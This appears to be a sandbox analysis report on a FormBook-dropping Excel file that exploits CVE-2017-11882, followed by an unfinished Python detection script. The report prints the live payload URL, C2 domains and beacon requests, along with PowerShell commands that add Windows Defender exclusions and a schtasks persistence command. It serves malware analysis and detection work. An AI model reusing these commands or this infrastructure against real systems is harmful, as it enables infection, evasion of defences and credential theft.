
Analysis Report Refno.191938.xlsx

Overview

General Information

Sample Name: Refno.191938.xlsx
Analysis ID: 404009
MD5: a6ea0794f2791f9f2bdfcdb467122e6b
SHA1: 83815a1977485c3fabdd49c91926d0482e3b78e1
SHA256: db692f9512b08149089a9d7295a04633f22944d87f2bfe53ae00d2c55f7502ca
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Non Interactive PowerShell
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2364 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2580 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2824 cmdline: 'C:\Users\Public\vbc.exe' MD5: BA01DF16E4C876E078348FD4479A8FDF)
      • powershell.exe (PID: 2884 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2924 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • schtasks.exe (PID: 2436 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp4D08.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • powershell.exe (PID: 2920 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • vbc.exe (PID: 1484 cmdline: C:\Users\Public\vbc.exe MD5: BA01DF16E4C876E078348FD4479A8FDF)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cmmon32.exe (PID: 2376 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: EA7BAAB0792C846DE451001FAE0FBD5F)
            • cmd.exe (PID: 952 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.kelurahanpatikidul.xyz/op9s/"], "decoy": ["playsystems-j.one", "exchange.digital", "usaleadsretrieval.com", "mervegulistanaydin.com", "heavythreadclothing.com", "attorneyperu.com", "lamuerteesdulce.com", "catxirulo.com", "willowrunconnemaras.com", "laospecial.com", "anchotrading.com", "mycreditebook.com", "jiujiu.plus", "juniperconsulting.site", "millionairsmindset.com", "coronaviruscuredrugs.com", "services-office.com", "escanaim.com", "20svip.com", "pistonpounder.com", "lasecrete.com", "sabaimeds.com", "madinatalmandi.com", "jumlasx.xyz", "smartspeicher.net", "punkyprincess.com", "herren-pharma.com", "belfastoutboard.com", "safifinancial.info", "xn--15q04wjma805a84qsls.net", "washingtonrealestatefinder.com", "jewishdiaspora.com", "aerinfranklin.com", "taylorglennconsulting.com", "fartoogood.com", "samjinblock.com", "minianimedoll.com", "saporilog.com", "littlebirdwire.com", "xn--farmasi-kayt-c5b.com", "purifiedgroup.com", "purifymd.com", "renewedspacesofva.com", "pilardasaude.com", "varietycomplex.com", "leadsprovider.info", "streamxvid.com", "manuelbriand.com", "hellosunshinecrafts.com", "hellodecimal.com", "4980057280880200.xyz", "dynmit021.digital", "hotdogvlog.com", "fairyrugs.com", "ievapocyte.com", "prospecsports.com", "proteknical.com", "36rn.com", "mongdols.com", "rentportals.com", "drcpzc.com", "h59h.com", "sonjowasi.com", "nalanmeat.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x100da8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x101022:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x12d5c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x12d842:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x10cb45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x139365:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x10c631:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x138e51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x10cc47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x139467:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x10cdbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x1395df:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x101a3a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12e25a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x10b8ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x1380cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x102733:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x12ef53:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1129b7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x13f1d7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1139ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
13.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
13.2.vbc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
13.2.vbc.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17619:$sqlite3step: 68 34 1C 7B E1
        • 0x1772c:$sqlite3step: 68 34 1C 7B E1
        • 0x17648:$sqlite3text: 68 38 2A 90 C5
        • 0x1776d:$sqlite3text: 68 38 2A 90 C5
        • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
13.2.vbc.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
13.2.vbc.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 198.23.213.57, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2580, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2580, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ohms[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2580, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824
Sigma detected: Execution from Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2580, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 2824, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe', ProcessId: 2884

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://198.23.213.57/ohms.exe; Avira URL Cloud: Label: malware
Found malware configuration
Source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp; Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Refno.191938.xlsx; Virustotal: Detection: 30%
Source: Refno.191938.xlsx; ReversingLabs: Detection: 23%
Yara detected FormBook
Source: Yara match; File source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ohms[1].exe; Joe Sandbox ML: detected
Source: 13.2.vbc.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
Source: Binary string: dows\System.Management.Automation.pdbpdbion.pdbn\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbExplorer.Default -extoff source: powershell.exe, 00000005.00000002.2148838575.0000000000614000.00000004.00000020.sdmp
Source: Binary string: System.Management.Automation.pdb:Z source: powershell.exe, 00000007.00000002.2161752463.000000000630D000.00000004.00000001.sdmp
Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb< source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, cmmon32.exe
Source: Binary string: System.Management.Automation.pdb' source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb] source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2153198993.0000000002970000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\Public\vbc.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: global traffic; DNS query: name: www.20svip.com
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 198.23.213.57:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 3132 WEB-CLIENT PNG large image width download attempt 198.23.213.57:80 -> 192.168.2.22:49165
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.kelurahanpatikidul.xyz/op9s/
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Date: Tue, 04 May 2021 14:40:50 GMT; Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27; Last-Modified: Tue, 04 May 2021 13:26:38 GMT; ETag: "b3600-5c18107215abc"; Accept-Ranges: bytes; Content-Length: 734720; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: application/x-msdownload
Source: global traffic; HTTP traffic detected: GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1; Host: www.20svip.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View; IP Address: 198.23.213.57
Source: Joe Sandbox View; ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View; ASN Name: SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong
Source: global traffic; HTTP traffic detected: GET /ohms.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 198.23.213.57; Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DAC28400.emf
Source: global traffic | HTTP traffic detected:
    GET /ohms.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 198.23.213.57
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (this request is repeated 8 times in this section):
    GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1
    Host: www.20svip.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: powershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: www.20svip.com
Source: powershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2154252217.0000000002DF7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000005.00000002.2154252217.0000000002DF7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.2161399460.000000000AE80000.00000002.00000001.sdmp; powershell.exe, 00000005.00000002.2151765266.0000000002430000.00000002.00000001.sdmp; powershell.exe, 00000007.00000002.2152599729.00000000021B0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2153930847.0000000002521000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2154252217.0000000002DF7000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe | String found in binary or memory: http://vbcity.com/forums/t/51894.aspx
Source: powershell.exe, 00000005.00000002.2154252217.0000000002DF7000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.2161399460.000000000AE80000.00000002.00000001.sdmp; powershell.exe, 00000005.00000002.2151765266.0000000002430000.00000002.00000001.sdmp; powershell.exe, 00000007.00000002.2152599729.00000000021B0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000005.00000002.2154252217.0000000002DF7000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000003.2138542609.000000000063B000.00000004.00000001.sdmp; powershell.exe, 00000007.00000003.2140413663.00000000002D8000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000003.2138542609.000000000063B000.00000004.00000001.sdmp; powershell.exe, 00000007.00000003.2140413663.00000000002D8000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000007.00000002.2155583236.0000000002BC0000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: vbc.exe | String found in binary or memory: https://github.com/MrCylops
Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
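The two network findings above are worth reproducing as detection logic: the stage-2 download from 198.23.213.57 is fetched by raw IP (hence "TCP traffic detected without corresponding DNS query"), while the FormBook beacon to www.20svip.com is a short alphanumeric directory with two query parameters, a base64-looking second value and "Connection: close". The script below is an added example written for this page; it is not part of the sandbox report or its signature engine. The event stream, the resolved address 203.0.113.10 and the beacon heuristic are constructed assumptions; only the IP, the host name and the two request lines come from the report.

```python
import re

# Constructed event stream in the spirit of the report's networking entries.
# 198.23.213.57, www.20svip.com and the two request lines are from the report;
# the resolved address 203.0.113.10 and the ordering are assumptions.
STAGE2_REQUEST = (
    "GET /ohms.exe HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Host: 198.23.213.57\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
C2_REQUEST = (
    "GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1\r\n"
    "Host: www.20svip.com\r\n"
    "Connection: close\r\n\r\n"
)
SAMPLE_EVENTS = [
    ("tcp", "198.23.213.57"),                     # stage-2 download by raw IP
    ("http", STAGE2_REQUEST),
    ("dns", "www.20svip.com", ["203.0.113.10"]),  # C2 domain resolves first...
    ("tcp", "203.0.113.10"),                      # ...so this connection is expected
    ("http", C2_REQUEST),
    ("tcp", "198.23.213.57"),
]

# Beacon shape as seen in this report. This heuristic is the author's
# assumption, not a vendor signature, and will also hit some benign traffic.
C2_PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def parse_request(raw):
    """Split a raw HTTP request into (method, target, lower-cased header dict)."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, target, _version = head[0].split(" ", 2)
    headers = {}
    for line in head[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


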